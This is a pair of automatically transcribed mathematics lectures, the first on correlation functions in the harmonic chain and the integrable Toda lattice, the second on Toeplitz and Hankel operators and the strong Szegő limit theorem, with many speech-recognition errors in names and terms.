Gibbs measure of the system. So we have it, so we take the Hamiltonian, and Z of t is the normalizing factor, and we have e to the minus beta h of q and p. My Hamiltonian beta is the inverse temperature times the volume of my phase space. Since h is a Hamiltonian, so is a conservantity, and since the Hamiltonian flow conserva volume, so we can say that the measure at time t is equal to the measure at time zero, and this is exactly the Gibbs measure. So what else? So the next step is to study two points correlation function. For example, for the position, the two point correlation function is the expectation. So we center our chain of particles, so it's from one to two n plus one, so the n plus one one is at the center of my chain of particles. And so we have, we want the expectation of the particle in the center at time zero, and the particle in a position alpha with respect to the center at time t. And minus the average of this value. So this is the fluctuation, is time space fluctuation. This quantity is time space fluctuation. And you can define in a similar way position momentum, momentum correlation function, momentum position, correlation function, and so on. So these are the quantity of interest. So the goal is to understand the large time behavior of this correlation function. So, and the behavior for long time, and beta, so we want beta, so low temperature, so beta sufficiently big, not too big, but beta sufficiently big, and the number of particles become large. So for this problem, I mean, there is quite a big amount of literature, numerical literature. So when it was started, I mean, there are several papers, last ten years there have been a flourishing number of paper doing numerics. So, and the claim is the following. So this quantity, this correlation quantity behaves in two fundamental different way according whether the system is integrable or not integrable. So it falls into two different classes. So, and this is a picture taken from this paper from Kundum Dahar. It's a PRE 2016. So what I'm showing there. So you have some peaks, and these are the correlation we respect, for example, to Q. I mean, and so these peaks are shown. So you have some peaks traveling. So the red peaks, let's see if there is a tiny, tiny, no, is that okay. Do you have one? Is without battery. Or maybe there are some batteries here. Let's check. Thank you. Okay. Kako so bevo formelj, Proste, ki? La luce. Okay. Thank you very much. Okay. So this is our, so this is our, this wave. So this wave peaks correspond to the same correlation function. So they start in the middle we want they move one to the left and one to the right, and they are sure different times. So this is time. For example, 500, 1000, 1500. So these are three peaks. And so physicist are interested in scaling on these peaks. And so the claim is that if you, if you, if you scale, so if you plot these peaks in the scaling regime so they travel with constant speed, they decrease as a function of t and they get larger. So the claim is that if you make a plot of these three peaks in this scale plane, x plus ct divided over t, t to the one is t. So these are three peaks. So and the same here. Then you look, you see only one peak. So on this be. Is C is in the paper is my what I call S correlation. Function, one of the correlation function, they call it C. I call it S. So they have this scaling and this scaling is called ballistic scaling. I mean, in the physical literature. OK, so this is the same, the same stuff for the FPU. So FPU. So this is total artist is an integral system. FPU is the same. FPU is not an integral system. So is there the quartic oscillator. And so there is the same plot of the same object. And now you want to scale it again. And so now the scaling is t to over three and two over three here. And so and they have also the shape of this stuff, which is called in FKPZ. So this is falls in the KPSI universality class. So basically it looks like if you take a stochastic equation with a given initial data or deterministic equation with random initial data. When you are in the noninteriable case, you basically more or less when you study fluctuation, you fall in the same class. But this is only numeric. So in this in this business, there is only numeric. So to prove this fact is completely, I think, out of reach at the moment. It's very complicated. So let me let me do some comments on the integrable case. And I'm starting with the basic integrable equation, which is the harmonic oscillator. So we start with the harmonic oscillator and we want to compute these quantities. So and this is an exercise, which probably all of you will be able to do. But let's do it together. So we have zero boundary conditions so I can write this quadratic Hamiltonian. So this is monic oscillator with we have this variable mu and both are 0. And so these we can write the quadratic Hamiltonians in this form where this matrix is responsible for this coupling of near neighbors interaction. And I want to solve the question of motion. So if you don't analyze this matrix, you end up with a chain of a couple of see later. Which is given here. So if I call the eigenvalues and eigenvectors of m lambda j and and the WBJ, and then I can make a change of variable between my q amp to q hat amp, which is basically Fourier transform, discrete Fourier transform. And my Hamiltonian becomes a couple. So the Hamiltonian becomes a sum of uncoupled harmonic oscillators, which I can solve as sine cosine. OK. And the frequency omega j is just the combination of square root of mu lambda j plus 2 mu, which was entering the equation is to quantity. OK, so far so good. So let's go home. So now we go to the Gibbs measure. So the Gibbs measure is this given by this quantity where this is the normalizing factor. So this change of variable is a canonical change of variable. And so the Gibbs measure become basically product of n Gaussian to n plus one Gaussian in this normal in this new variable dp hat j and dq hat j. And now I can calculate all these correlation functions. For example, if I want to consider the two point correlation function of momentum pp, so it's given by this expression. So p, so the expectation of the p is zero here, because this is Gaussian, even in the original variable. So the average value of the p at any, at both time t, at time zero is zero. And the pp correlation function is basically given by the expectation of this quantity pn plus one minus minus halve, which is hold this p here plus pn plus one zero, which is this p here. OK, and now so you see these are all Gaussian variables. So the only terms that contribute is the product of pj pk when p hat j p at k. So this is our calculating zero when they are the same. So you get these two points correlation function. So is the sum from one to two n plus one, one over beta, the cosine of omega j in times these two vectors that are the vectors that change coordinates. So let me stress that beta doesn't enter in the evolution at all. OK, so now I let me write a little bit rewrite this quantity to make some jina. So in the building the SPP is not from the point where the origin was, but it is a point minus one point correlation function. So is well is the correlation at the point times zero at the point n plus one time t at the point n plus one minus alpha. No, but you want to you remove the average. This is the definition. But then you're going to change the part of it. Your assumption is getting some one point correlation function. No, no, because this is this is here. This one is this piece here, the first piece here. And this pn01 is this piece here. So. And this is always zero because we are in a gaussian distribution. OK, so. So what else? So let me so we arrive to this formula and let me let me try to get to get some more to massage it a little bit more. So if you plug in the explicit value that you have vkj and lambda j whatever. So it ends up with this with this form. So. And now I want to sound from m from zero to n. So so is this so is the product of two cosine with this weight. So let me make a substitution. So now I'm a little bit pedestrian. So you put s here equal m over n. So here you have an m over n m over n one over n. So and delta s is one over n. So here I can become my my delta delta s. And here I can change this. I'm over n to an s. So this this s p p alpha t in the limit tangos to infinity become an integral. Which is given here plus some exponentially small errors. So is a very explicit formula that is obtaining a very straightforward weight. OK. And so you can prove this formula. The part to prove is there or is not the leading term. So the part to prove is there. And you can another exercise, which is also elementary. So this was obtained with the Rich Le boundary condition. If you move to periodic boundary condition, you get the same formula. So it doesn't matter the end points what you put. And so with the same with the same gymnastic, you can get the other coloration functions on the qq and the qp. So let me just make an observation. So if you put here the mu equal to zero, this object is basically basal function. So and so when you study t goes to infinity, you study the behavior of basal functions t goes to infinity. However, you cannot really put mu equal to zero, because if you put mu equal to zero here, this remaining piece is divergent. So it's going to infinity, both here and here. So this two mu minus two cos mu is divergent at zero. So you cannot. OK. So and another observation is that when you study, so I was telling you that this correlation function are studied in the limit of beta largest, so small temperature to limit. But for the harmonic oscillator, you see that I mean the large time behavior is quite independent from beta. So it should not depend from beta. OK. So the study of this quantity, so the large time behavior of this quantity in the afternoon can make laugh and win. We discuss how this object will behave for large time. OK. So now the goal is to. So this is was a linear integral system harmonic oscillator. So let me try to explain what happened with toda. So what can we say with toda? So I'm going to explain some basic integral system techniques. So regarding, so we are doing this, this business for integral system, and you can object to me that there are no many integral system. I mean, in respect to. So the number of integral system with respect to the number of non integral system is much more. But still, I mean, despite there are some finite number of point in the set of dynamical system, it's still interesting to look at what happens. OK. So the toda lattice is a model of interactive particle with nearest neighbor interaction, which was introduced in about 1967 by this physicist, Morikazu Stoner, which is a statistical mechanic guy. And so if you put a coefficient here alpha in front of this interaction and you make alpha small, you can. You can show that so this is a miltonian at leading order is converged to the Hamiltonian of anharmonic oscillator plus I. Over the correction. OK. So toda found out that several he found out several exact solution of this equation. And then people start to think that maybe the dynamical system is an integral dynamical system is a higher is definitely non linear and integral. And so integrability was discovered on the 70 but flash can manakov. And the idea is to perform a change of variables. So you introduce a new dependent variable a j and b j by this expression. And so with so with this definition, since we have periodic boundary conditions so the so we have that the product of the j is equal to one. And so the toda equation in this new variable so replaced by basically quadratic equation so two couple quadratic equation. So how to integrate them so I will revise very quickly the theory. So let me first show that if you introduce this matrix, which is called the lux matrix and another matrix, which I call a, which is the upper diagonal of l minus the lower diagonal of l. Then this quadratic equation of motion. So this equation here are equivalent to this commutate matrix commutator of a times cell. So the derivative of the l over dt here so you make derivative is equal to this matrix commutator. So what is the advantage of this formulation so the advantage is that since I is a commutator so it means that the eigenvalues of failure constant of motion. And at this point I want to say that the eigenvalues generic are not distinct. So we have so we have a system of two n particle and we found basically lambda one lambda m constant quantity, which they turn also to be independent. So it means more or less that the system is integrable. And let me show it how to integrate it. So so to integrate it we need some other eigenvalues, which are obtained from l by chopping out the first row and first column. So you chop out the first row and first column for him, and you get this m minus one matrix, which I call m. And this matrix so is three diagonal and symmetric and the upper and lower diagonal are positive because these are exponential of q. So they are positive. And so it means that the eigenvalue are all these things. So we have m minus one and give value and they are all these things. So Brian Reider mentioned that I mean so the spectral tier of the three diagonal matrix so let me a little bit go through it. So. So we have now two sets of n degree value so mu one q two mu m minus one and lambda one lambda two lambda n. And so the claim is that when we studied the theory of periodic Jacobi operators which correspond to hell. So it's possible to recover my my original variable a one a m b one b m from this data so lambda one lambda n mu one mu n. OK, so this is mu n mu one mu n are the eigenvalue of this matrix. The eigenvalue of l. Of the full. So we have two different matrix. And so one of these is is is straightforward. So since the trace of l is a constant motion, so we can say that b one is equal to the sum of from j to two to n of the b j plus the sum of the lambda j. So the trace are the same. So it means that the sum of the b j is equal to the sum of the lambda j. So I can write this equation and looking at them. So this is equal also to the minus the sum of the mu j. So b one is obtaining a simple way from the spectral data. And also there is also another trivial integral, which is n, which is the inverse of the product of the j from one to one. OK, so this is this is half of the way. I mean, I want to sorry, I'm a little bit to. There are these is so this is our. Yeah, there are some. So this is yes, this is come out. So the product of a j is equal to one, so you have one less. So the product of the a are equal to one. So on the on the sum of the b are equal to constant, which is the sum of the. Sorry. No, no, the formula for a j. I still have to give it. So now I want to. So this is basically now. I mean, I want to a little bit do some study some property. Spectral theory of this, this matrix, m to recover the b and a is from two to n and a is from two to minus one from the spectral data. So let me remind that so this is symmetric to diagonal matrix and can be orthogonal. So we're always on orthogonal matrix in lambda is the diagonal. And so if we take an eigenvektor v of m and we write this equation mv equals mu v for some you. So the component of this vector, so which should be a transport, yes, this should be a column vector. So vj is a polynomial in mu of degree j minus one. So if you write this equation, so is a trigonagonal matrix when you have orthogonal polynomial is the same structure. So it means that vj is equal to v1 times, which is always no zero time a polynomial so of degree j minus one, which I call in this way amp is zero is equal to one. So basically I can write basically my matrix so so if I introduce I define that the square of the first entries of the row of all I define it like wk. So the orthogonality relation give me that wk is equal to one and the matrix so can be written in this form. It's another way to write the matrix for so basically this is our the eigenvektor of all on the orthogonality relation on the row so this orthogonality relation time see this formula here so the sum from k for one to minus one of wk plk. Pl of evaluating mu k pj evaluating in uk is equal to delta lj. So this formula basically tells us that the pl are orthogonal polynomial normalize orthogonal polynomial with respect to the discrete weight wk at the point uk. So, and so the theory so tells us that if we know the w and the mu we are able to build the p. So the only data that we need knowing the spec the weights and the points this is a sufficient data to build the pl. uk. And so the data so will be basically so my my data will be basically the first row of the orthogonal matrix and the points mu k. Once I have this data I can recover the entries bk plus one. From the matrix mkk the diagonal and the ak plus one from the upper over the diagonal by this formula. So, I still need to so this is just there is no dynamic here so I'm just this is just a formula for the constructing from the orthogonal polynomial. So the inverse problem from the orthogonal polynomial the three diagonal matrices and the map is one to one. Now I want to say more about this, this w and the evolution of this m, this mu so the w and the mu are not constant in time but a function of time. So, and this is basically is coming a little bit out of the blue but so this time evolution is so was obtained in the 17 paper by Casper Merberke. And so you need to introduce two polynomials one is q and one is p q is just the monic polynomial which has root the lambda j the game value fell and peace the monic polynomial that has roots the game value of m and I call it mu j. And so the evolution of this of this mu so the mu evolves in time according to this rule so here be prime is the rivati with respect to to the argument so that when you evaluate this polynomial in you are you is not zero. So, it is not absolutely clear from from from this formula that this quantity on the square root is positive and real so make let me make a plot. So, the plot is the following how it looks the q so you need to know more a little bit so the q. So, the q looks in the following way. So, this is q of lambda. So, lambda this is zero and this is minus four. And for example, let's do it for n equal to four. So, the q of lambda then will be. Okay, like that, so this is will be my lambda one, lambda two, lambda three, lambda four so there is always four roots and at most two roots can be coincident. So, the same here so we have. So, this q of lambda always lead the line minus four. And here we have some other points which I called lambda one minus lambda two minus lambda three minus lambda four minus so this is this property in the house from study the spectral theory of Jacobi operator. And, and another thing you need to know is where in this picture the lambda see the the music so the music basically can see it's only here so here you have one, mu two and mu three. And then you can only move so in this in this space here so they can see it's only here. Okay, so with this property so once I tell you how the mu and the lambda place you can see that q for example of mu one and q of mu one plus four they are both negative so the product is positive. And you look at several points here. Okay. And then so my weight so also the weight that we had that I define before. Also the weights are an explicit expression, which is given by this formula here so this everything I mean this is come out from from this paper. And the weight wl that I introduced before as an explicit expression. And also in this case it's easy to see that when this is positive. Sorry when this is positive this is negative and vice versa. So, so that this quantity is always positive issue. You make this picture. So now we know that. Okay, so this is the sign of this delta is equal to the sign of the first term, because the problem. Okay. And yes, the condition that the sum of wl from l to one minus one is equal to one gives me now this quantity so the a one so is just an integral. So I have the first expression of a one as a function only on my spectral data the mu and the lambda. So this is the first, the first, the first. Entrance of a one and then we've been the other one, but before before going on let me make some comments on this equation so. So this is odd for the muse is a is a is an only so is a simple odd and let me do some small small change of variable. So if I do this change of variable, so I sum over the mu by this quantity. And then it's straightforward to check that if I consider the derivative of the xi r over the t is equal to this quantity here so is the is the sum from l from one to a minus one of this product and this is equal to zero to two. So basically in this change of variable I have linearized equation that can be solved in a straightforward way. No, suppose we are able to solve it and now we have basically all the, all the, all the a's in the B so I'm integrating everything. So I have so the explicit formula for a one and a n so any is a is a quadrature and then be one we find it before now the dependence of time is here, and then the BK and the K for K from one to a minus one can be obtained by from the orthogonal inomials pk and pk plus one in the usual form. Okay, this is the structure of the integration. Okay, so this is so is an integrable system or less we have integrated it. So this is a little bit, I do say maybe not the most explicit formula you can get. There are some other formula that I mean you can get using hyperalytic data function which can be obtained through the is material formula obtained for KdB, but it's quite so the expression is quite compact for what we want to do. Okay, so now I mean I have this explicit formula I want to see what they can do for regarding correlation function. So this is so this is so this is my so I take my Gibbs measure so now this is h is the Hamiltonian of the total lattice. And this is a normalizing constant there is I mean I mean there is a change of variable so we have the P and the Q and I told you that everything can be put in terms of mu in lambda. And this is what you get from this measure so you get this measure where the mu this delta are the wonder month and this is the Q. So this is my Gibbs measure. And so the two point correlation function are obtained. So now the two point correlation function for example respect to the position position are obtained by this expression where the average of E of p since I mean in respect to p still gaussian is zero so is given by this interesting and challenging formula. So we have the P here, the P n plus one minus alpha the first term, then the P n plus one the second term and then the measure. Ok, so what to do with this. I mean this is a little bit challenging to study behavior for tea large and large. And so can in the afternoon will will say something more about this. Ok, so I'm finished. We have plenty time for questions. I went too fast. You said that the behavior for integrable and non integrable case are very much different but I missed this point. No, no, this is what numeric is not. Yes, but on numeric it looked like similar. No, no, no, the numeric is quite different. I mean so as I told you there are two universality class here. It's not even clear that the integral case is only like that. So this is the scaling is two over three. So it decreases lower because I mean in the integral case since you have an integral system. In so you have if you have to ends and particle in your face space is dimension to n, but it's integral. So it means that the face space the part that the system explore is n dimensional because you have an constant of motion. So the space is smaller. So it looks like thing decay faster like. Well, in the integrable case the face space that my system explore is slightly bigger so the decreases to over three. And so regarding this this plot I mean is there is a little bit more than this so this is this shape is called fkpz universality class. I make a reaction that when you are talking about different statistical behavior of integral or non integral system it is we are talking now about this quantum chaos. It's related to some quantum chaos conjecture. But this is for I'm not quantum you are in some more classical than this. I don't know. For classical integral. If I could so this so you cannot come. I cannot comment on this. So you mean that the quantum the classical integrable system. The classical integral system. See the function of a different. For example. Yeah, the zero of the function of different statistical behavior, but I cannot relate much to this. So this is the different. Yes, they have different so the zero of game function didn't have a statistical for large and for larger energy of different statistical behavior. But this is a very innocent so looking at this you take so you take integrable system render initial data you want to study correlation function. So for the harmonic oscillator the temperature is just perfect. So do you think it's the same for total or in general for integrable system. Numeric show difference actually numeric show different behavior for if you take no linearity looks like the non linearity enters in the. So it's not just a sort of pre factor in the correlation function. No, in the non linear case no. No. Yeah, I have another question so related to this to picture for example. So is this are the two curves universal in the two classes. Sorry, are the two curves universal in the two class so if you plot the same picture for the harmonic oscillator. No, you don't get the same. I mean, I think in the integrable rea. This is more is is more complex. I don't think so. She can we show the harmonic oscillator is not even behaving like this. And then the non integral case do you see the same interval case so they experiment are for FPU and this gets like Gordon. And they are the universal indeed. So there are these two maybe some other. No, this credit on linear shreddinger. Sorry, this credit on linear shreddinger. There are universal so they are the same universality class. Yeah. But. So that I want to say there is not a single not even for the harmonic oscillator is a mathematical ringers calculation. Yes, in the morning oscillator. Well, it looks like it's T1 half actually. So from the analysis. Yeah, yeah. Is bit. Ken. Homework assignment. The homework assignment is. Exercise one. Preformula in exercise two. So periodic boundary condition. Okay, this is the homework assignment. Does it make sense to ask this type of questions for systems is infinite number of degrees of freedom. Yeah, yeah, yeah, no, you can ask, but I mean, so the point is to, yes. So for example, for this Schrodinger equation, they was easy to discretize. Make make the statement and let time goes to infinity rather than starting directly with the infinite setting. So, as. Both from the I think both from the point of view of numerics in computation is much easier. The discretize the space and. Yes, mandel and spawn actually prove for for an less so they did this discrete. Discrete linear Schrodinger equation and discrete integrable linear Schrodinger equation. And so they show different universality class. So the. Integrable linear Schrodinger equation is called ablomitzladik. Latis. Is the assignment. You see the same. No, today I mentioned things are. No, they decrease much faster. The only rigorous mathematical result I think in this business in dimension bigger than three is a paper by look Arjanin in sponi in in zones. Is the only paper in the literature where they are able to compute the K of correlation factor money need to increase the space. So the most difficult case is the one dimensional case where the correlation function decrease slowly in higher dimension that decrease much faster and it's easy to prove things. More questions. Ok, let's tank professor for very pedagogical. Ok.
We will investigate the form of spatio-temporal correlation functions for integrable models of systems of particles on the line. There are few analytical results for nonlinear systems, and so we start developing intuition from harmonic chains, where steepest descent analysis yields detailed asymptotic behaviour of the correlation functions in a variety of scaling limits. We will introduce integrable nonlinear lattices, explain the integrable solution procedure, as well as computational simulations to see dynamics of correlation functions in action.
10.5446/54154 (DOI)
So I'm going to talk about some questions this morning about tophalates matrices and determinants. That'll be the focus of this morning and then in the other talks, some of the other topics. And I'm going to really start as if you have not seen this before. So let's just begin. So a finite tophalates matrix has that structure. It's an n by n matrix. It has constants running down all the diagonals. And usually the entries correspond to the coefficients, Fourier coefficients of some periodic function defined on the circle. But actually you could consider these for any infinite sequence whatsoever. But our focus will be always from the Fourier coefficient approach. So you have a function. You take the Fourier coefficients. You generate these. And the question is, if you take the determinant, what happens is the size of the matrix gets large. So as n goes to infinity. Such matrices occur a lot in mathematical physics. Originally they were considered for, or one of the original motivations was the two-dimensional Ising model and computing correlations there. But they arise in random matrix theory and in other places. And I hope we'll see some of that as time goes on. OK. So the second question that we'll tackle, and this is maybe in some sense slightly more related to the Pan-Leve equation connection, is if you take an integral operator on a line segment, and think of right now as the line segment is finite. So we just have k of x, a function on the line continuous. It actually doesn't even have to be that. It could be just bounded for what we're going to do. And it just takes a function and multiplies it by k of x minus y and integrates. So that function k of x, y, which is little k of x minus y, is called the kernel of the operator. And now the question is what happens to the Fredholm determinant. So I'll give a definition of this later in the slides if you haven't seen it before. But what happens to the determinant of i minus lambda t? Now we want the size of the interval to increase. OK. So that's the second question that we'll think about. And it turns out that really you can answer both of these questions in almost exactly the same way. So the same technique that works for one works for the other. And so what I'm going to do this morning is show you how to answer in the beginning the toplet's case because it's a little bit easier to think about. And then later we'll actually look at the integral operator case as well. And please ask questions if anything is not clear. OK. So if you're thinking of these finite matrices and you're letting n go to infinity, it's sort of natural to say, does the answer to that question have something to do with the infinite array? I mean, why not just get rid of n altogether? And so the answer to that is, yeah, in some sense that is true. Not quite. But so we want to just look at the infinite array here. Let me see if I, is this my pointer? I'm not sure this is pointing to anything. Oh, OK. Anyway, we want to look at the infinite array and think of it as an operator on a Hilbert space. And there's lots of ways to do that. And what we're going to do right now is absolutely maybe the most natural thing to do. But actually, sometimes you want to do other things as well. So I'm going to say some very simple things in the next slide. And but it's important to remember that you're picking that because a finite matrix doesn't actually care in some sense about the Hilbert space. You know, you can use whatever you like. So what we'll use is the most probably natural setting. And that is to take just the generalization of Euclidean space and to look at little l2. So we're just going to look at sequences that start at 0 and go to infinity that are square summable. And you can always identify those sequences with the Hardy space. So how you do that is you just take the f sub k's and you form a function f of e to the i theta, which is just the sum from k equals 0 to infinity of f sub k e to the i k theta. So that's a function defined on the circle. And f sub k is the Fourier coefficient, which is just defined by integrating e to the minus i k theta. So that's a natural setting, and you can actually think of that infinite matrix is just operating on the sequence by just multiplication, you know, just regular old multiplication the way you do matrix multiplication. OK, so you've probably seen h2 or little l2, but just in case you have an inner product, which is the standard one. A norm is given by just the square root of the sum, the square of the sequences. And every function in h2 has an analytic extension into the interior of the unit circle. So you just think of that same series, but you just think of the absolute value of z to be less than 1. And we'll go back and forth with that. So sometimes we'll think of the sequence, sometimes we'll think of the function that is analytic in the interior of the disk. OK. OK. OK. So now, what I want to do is realize that Toplitz operator, the thing that is infinite in two directions. I want to just describe that some other way. It's not just the infinite array. So we need a couple of definitions. One is just the projection of l2 onto h2. So what does that projection do? It just takes a sequence from minus infinity to infinity, so your entire Fourier series, and just cuts it off. And goes, all you do is just go from 0 to infinity. So you have an l2 function onto h2. And we're also going to think about a piece of n, which takes the series in h2 and projects to just the first n Fourier coefficients. So just chops everything off. So these projections we'll use all the time to set things up. OK. So this is the other description of a Toplitz operator. So instead of just thinking of that infinite array, we can say, take a function that's bounded and take a function that's bounded. And the Toplitz operator with that symbol, that function's always called the symbol, which operates on h2 back to h2, does the following. It takes a function f, that is, a function in h2, multiplies by phi. So when you multiply a function in h2 by a bounded function, you get a function back in l2, because the Fourier coefficients may not vanish for negative index anymore. So what you do is just chop those off. So you just apply the projection. So the Toplitz operator takes a function, it's just multiplication, followed by projection. OK. And to make sure that this is the right thing, if you look at the matrix representation with respect to the standard basis, so I don't think this is, I don't think I'm getting this thing here to work. So if you take t of phi and apply it to, say, e sub k, e sub j, which are just the standard basis for h2, and you just do the simplest computation and integrate, you can easily see. You end up integrating phi times e to the ik theta times e to the minus ij theta, because you're taking the conjugate, and that's phi of j minus k. And that says if j minus k is constant, that you have the same diagonal, so it's exactly the right matrix. We just want to make sure this is the right thing. OK. So that has the right matrix representation. OK. So once we have that, we need to define one more operator in what follows. And this is what we call a Honkel operator. And it has a diff slightly, actually a very different matrix representation. Doesn't look so different, but it is actually a very different operator. It's index form, it's phi sub j plus k plus 1. And as you can see, it has constants running down sort of the opposite diagonals. So you have a1, then a2, a2, a3, a3, a3. Honkel operators and matrices have been around for decades or maybe centuries. And it's going to be important in what we do. So there's two things I want to mention about this before we go on. The first thing is, if your Fourier coefficients vanish for index 1, 2, 3, and so on, this operator is zero. So you have to have some positive coefficients for this thing to not be zero. The other thing is, let's pay attention to how many of these coefficients we have, because it's going to be important. So we have 1 with index 1 and 2 with index 2 and 3 with index 3. And we'll see that that turns out to be a useful thing to observe right now. OK. So that's the Honkel operator. And why is it important? It's important because it's one of the fundamental sort of blocks in the algebra of topolitz operators. So here are just the very, very basic properties of topolitz operators. T of phi is bounded. This little computation at the bottom shows you that. It's pretty trivial to show that. So you just take the norm of T of phi of f, and that's just the two norm of phi of f. If the p doesn't matter, you can pull out the infinity norm of phi, and that's all you have. Actually, the actual norm of it is the infinity norm. We don't need that. We just need to know it's bounded. And of course, it's linear with respect to A of T of phi plus B of T of phi is A of phi plus B of phi, or psi. Sorry, psi. And if your function is identically one, then your topolitz operator is the identity operator. That's all obvious. And then properties D and E, I'm not going to prove. You can try to just write that out, and it falls out. But it says the following. Property D says if you're taking T of a product, it's equal to the product plus this leftover piece, and the leftover piece is the product of two honkles. And as we'll see, that's going to be useful. And you can also talk about the hunkle of a product, and it splits into two pieces. So H of phi psi is T of phi H of psi plus H of phi T of psi tilde. That tilde just takes E to the i theta and turns it into E to the minus i theta. So all that's doing is flipping your Fourier coefficients. So D and E are basically algebra computations, but just believe them right now. They're going to be useful. OK. All right. So now I'm going to tell you the answer, and then I'm going to prove the answer. So the best known result about topless determinants is the Strong-Zego limit theorem. And in order to get kind of the most useful setting, it's not if and only if, but it's the most useful setting, we're going to look at a bonnock algebra of functions. So this is a bonnock algebra of functions defined on the circle, functions defined on the circle, they're continuous functions. And they have the property that their Fourier coefficients are summable and that the sum of k, phi sub k, in absolute value squared is also summable. So both of those things have to be summable. Those are, if one works, the other doesn't necessarily either way. So you need both those conditions. And this is, for what we will do, it's a really nice bonnock algebra. And a hint of that is, remember that Honkel operator with the a1, 2a2s, 3a3s, that second sum there has something to do with that Honkel operator in some sense being small. So that's coming in a couple of slides. But that's one of the main reasons. But this is a bonnock algebra, it's closed. The functions are automatically continuous because of the l1 summability of the phi sub k's. And so if you multiply two of these, they have the same property. If you take a function in this algebra and exponentiate it, it has the same property. If you have a function that doesn't vanish and has winding number zero and you take the logarithm, it also has to be in this algebra. And that's also important. So any algebraic thing you can do that doesn't vanish, the inverse has to be in this algebra because it's a closed bonnock algebra. OK. Excuse me, very naive question. So if I were to take, so the norm is two summons, if I were to take only one of them, it would not be bonnock algebra under point-wise multiplication. Is this right? If I took just the first time. I've got to think about that. I think I'm not quite sure. I think if you took just the first one, it's OK. Yeah. Yeah, no, this is right. But you, right, we need both of them and they're not the same set of functions. Yeah. I think with the first one, it's OK. Yeah. OK. So now, here's the answer. OK. So d sub n is just going to be the determinant of t sub n. And what the Zegotherm says is that the determinant is asymptotic to g of phi to the nth times e of phi as n goes to infinity. And here are the two constants. e of phi is e to the log of phi, e to the zeroth coefficient of log of phi. And if you look at, that makes sense because if you read the top line, it says the function phi does not vanish and has winding number zero. So we know that its logarithm exists and it has the same properties. You can take the zeroth coefficient. The second term is e of phi, and that is the determinant of t of phi, t of phi inverse. So phi inverse exists. You can take its topolitz operator. And so we are taking two topolitz operators, multiplying them and taking their determinant. Now that determinant is actually an infinite determinant. And so here's the way the infinite matrix gives you an answer for the finite one. But it's not t of phi itself. You have to adjust things. Okay. So it's not clear that that last line even makes sense. What does that mean, the infinite determinant? So let me tell you, I'm going to tell you what that means. And then as soon as you know what it means, the proof kind of falls through. Okay. So we have to define this constant. We have to talk about infinite determinants. And so we're going to talk about trace class operators. So trace class operators satisfy a condition that says if you take any orthonormal basis and you have to be able to take any, that if you take t, t star to the one half and take the diagonal of that, that sum has to be finite. And so that's the definition. But the fact is this definition is hard to check. It's not something that's easy to check. So they're a nice class of operators. But what we want is an easier way to check. So what we're going to do is talk about Hilbert Schmidt operators. And Hilbert Schmidt are the things that are kind of easy to deal with. So an operator's Hilbert Schmidt, if you take the absolute value of its coefficients in the matrix array, square them and sum them and take any choice of orthonormal basis. If one is finite, they're all finite. And the sum is independent. So this is called the Hilbert Schmidt norm. So this is a very nice, easy to check. Because if you have the matrix array, you can more or less look at it. And the product of two Hilbert Schmidt operators is trace class. That's what is nice. It's like having two L2 sequences. You multiply them together, you get something that is L1. It's the analog of that. OK. So we'll worry about these two classes of operators. And here are some properties of trace class operators. These are well known. And they make everything easier. So they form an ideal in the set of all bounded operators. And they're closed in their own norm. Hilbert Schmidt operators also form an ideal. And they're also closed with respect to the topology defined by their norm. As I said, the product of two Hilbert Schmitz is trace class. If T is trace class, then T is compact. These are all limits of finite rank operators in these separable Hilbert spaces in their particular norms. So they have discrete spectra. And if they have, say, discrete spectra lambda sub i because they're compact. And the eigenvalues are L1 summable. So that's what follows from the definition of being trace class. So that fact, fact e there, allows us to write down an infinite product that we're going to define as the determinant. So if your lambda i's are eigenvalues of your operator, and you add one or the identity to it, then those eigenvalues should be one plus lambda i. So that infinite product then makes sense because your lambda i's are in L1. So that's the definition of an infinite determinant. It's one way to do it. And then another thing that is really useful is if you take an i plus T, where T is trace class, and you project, you apply the p sub n, where that's any set of actually orthogonal projections. It could be finite rank. They could be not. And if they are finite rank, we always think of the determinant defined on the image of that. So that will converge to the determinant of i plus T for any set of orthogonal projections. Property h is another useful property. If a n goes to a, strongly, that just means point wise. That means a n of f goes to a of f for any f in your Hilbert space. And b n star goes to b star strongly. And if T is trace class, a n, t, b n converges to a, t, b in the trace norm. That's what we need. And the functions defined by the trace, which makes sense, and the determinant are continuous on the set of trace class operators and with respect to the trace norm. So all of these are basic facts about these operators. If T1, T2, they don't have to individually be trace class, but if the product is trace class and T2, T1 are trace class, then the trace of T1, T2 is the trace of T2, T1. And the determinant of i plus T1, T2 is the determinant of i plus T2, T1. Okay, so if you think about ordinary determinants, everything that works there basically works here. You just have to be in the right setting to get things to work. Okay? All right. All right, so we want to apply this. First of all, we want to say the constant in this theorem makes sense, the constant in the Zegel limit theorem. So remember, everything is supposed to be an harmonic algebra, right? So phi is an harmonic algebra. It doesn't vanish, so phi in versus. So T phi psi is T phi T psi plus H phi H psi tilde. That's one of our conditions. So if you let psi be phi inverse, then you apply this. You just get T phi T psi inverse is i minus H of phi, sorry, T phi T phi inverse is i minus H of phi, H of phi inverse tilde, right? And each symbol is in the bonnock algebra, and what is the Hilbert-Schmidt norm of one of those operators? Well, those are the Honkels. So remember what they do. You have 1A1, 2A2s, 3A3s, you square them, you add it all up, and you get exactly that sum. So if you're in that bonnock algebra, then both of those Honkel operators are Hilbert-Schmidt. The product then is trace class, so that determinant makes sense. So that's the first thing. We have to have the answer make sense. OK? Is that OK? Yeah? OK. All right. OK. So now the answer makes sense, so now let's actually prove the theorem. All right. So I want to make another remark about these identities. So these two algebra identities, which are building blocks of everything we do, also tell you two other things. If you have a function, psi minus or psi plus, so these, if they have the property, say for psi minus, that for k bigger than 0, they don't have any 4A coefficients. They all vanish, or for psi plus for k less than 0, the 4A coefficients vanish. Then you can pull out those topolitz operators. And why is that? Well, think of that top thing with psi plus on the right. So if you look at T of phi T psi plus H of phi H psi tilde, if you have a plus function, the tilde changes it to a minus function because the 4A coefficients flip. So that doesn't have any then positive 4A coefficients, so therefore H of psi tilde is 0 and the same thing on the other side. So you can factor out a minus function on the left and a plus function on the right for topolitz operators. And you can do a similar thing for the Honkel, except they both involve minus functions, essentially. You can factor out a minus function on the left and phi plus tilde, you can factor it out as psi plus on the right. I hope I had the rights and left straight because I mix those up all the time. But anyway, yeah, minus on the left plus on the right for topolitz. Okay, that just follows from that identity. All right. Okay, so now let's continue with what I hope is the proof of this. So if phi sub k is 0 for k less than 0 or k bigger than 0, then the topolitz matrices are triangular. So now I'm talking about the finite topolitz matrices, right, because the positive 4A coefficients were below the diagonal and the negative coefficients were above the diagonal. So you just have something that's either here or here. So the determinant is trivial in that case. Determinant of 